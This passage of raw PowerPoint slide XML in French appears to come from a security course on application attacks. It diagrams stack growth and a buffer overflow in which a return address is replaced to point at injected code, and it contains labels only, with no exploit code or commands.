              <a:tr h="359006">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>l</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>y</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>l</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="359006">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>e</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>t</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>i</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>n</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="480202">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>i</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>f</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>e</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>d</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="395099">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>s</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>i</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="445753">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>s</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>i</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>h</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" smtClean="0"/>
                        <a:t>t</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="77" name="Groupe 76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7262431" y="1192641"/>
            <a:ext cx="1166326" cy="3300737"/>
            <a:chOff x="4710109" y="1845403"/>
            <a:chExt cx="1166326" cy="3300737"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58" name="Connecteur droit avec flèche 57"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5293272" y="2482140"/>
              <a:ext cx="0" cy="266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ZoneTexte 58"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4710109" y="1845403"/>
              <a:ext cx="1166326" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Le sens de croissance de la Stack</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17484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attaques applicatives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="657547"/>
            <a:ext cx="9805416" cy="769666"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflow : injection de code malicieux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="82" name="Espace réservé du contenu 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1643183224"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2252315" y="1826584"/>
          <a:ext cx="2135405" cy="4996870"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2135405"/>
              </a:tblGrid>
              <a:tr h="304800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnT w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="760150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="276621">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>str</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t> (pointeur)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="276621">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Valeur de a</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="276621">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Adresse de retour</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="470256">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Pointeur frame précédente</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="276621">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>valeur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de x</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="276621">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Valeur de y</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1438431">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>buffer[99]</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>     .</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>     .</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>     .</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>     .</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>buffer[1]</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>buffer[0]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="276621">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnB w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="83" name="Groupe 82"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1135455" y="2848550"/>
            <a:ext cx="864795" cy="3620525"/>
            <a:chOff x="563955" y="2752725"/>
            <a:chExt cx="864795" cy="3620525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="Accolade fermante 83"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1256792" y="2752725"/>
              <a:ext cx="171958" cy="3620525"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 82291"/>
                <a:gd name="adj2" fmla="val 487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86" name="ZoneTexte 85"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="563955" y="4229194"/>
              <a:ext cx="719232" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Frame </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                <a:t>func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>()</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87" name="Groupe 86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1135455" y="1837747"/>
            <a:ext cx="864795" cy="982228"/>
            <a:chOff x="563955" y="1770497"/>
            <a:chExt cx="864795" cy="982228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Accolade fermante 87"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1256792" y="1770497"/>
              <a:ext cx="171958" cy="982228"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 82291"/>
                <a:gd name="adj2" fmla="val 487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89" name="ZoneTexte 88"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="563955" y="2008307"/>
              <a:ext cx="719232" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Frame main()</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Plus 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4459532" y="3740147"/>
            <a:ext cx="492801" cy="492801"/>
          </a:xfrm>
          <a:prstGeom prst="mathPlus">
            <a:avLst>
              <a:gd name="adj1" fmla="val 769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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="91" name="Tableau 90"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2484117468"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5011380" y="2186434"/>
          <a:ext cx="1511559" cy="4329241"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1511559"/>
              </a:tblGrid>
              <a:tr h="719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Code malicieux</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="619125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="299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Nouvelle adresse</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2686050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Flèche droite 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6793977" y="3637470"/>
            <a:ext cx="653143" cy="20535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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="93" name="Espace réservé du contenu 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1929720386"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7530387" y="1553149"/>
          <a:ext cx="2150707" cy="5304851"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2150707"/>
              </a:tblGrid>
              <a:tr h="609601">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnT w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="7048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Code malicieux</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="666750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
